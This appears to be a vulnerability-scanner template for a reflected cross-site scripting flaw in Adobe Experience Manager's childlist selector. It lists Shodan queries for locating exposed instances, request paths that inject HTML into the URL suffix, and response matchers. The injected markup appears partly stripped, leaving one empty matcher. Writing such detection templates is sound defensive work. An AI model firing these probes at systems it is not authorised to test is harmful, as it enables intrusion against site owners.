id: aem-xss-childlist info: name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting author: theabhinavgaur severity: medium description: | Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: max-request: 2 verified: true shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: xss,aem,adobe,misconfig http: - method: GET path: - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '' - '

please authenticate

' condition: or - type: word part: body words: - 'data-coral-columnview-id' - type: word part: content_type words: - 'text/html' - type: status status: - 200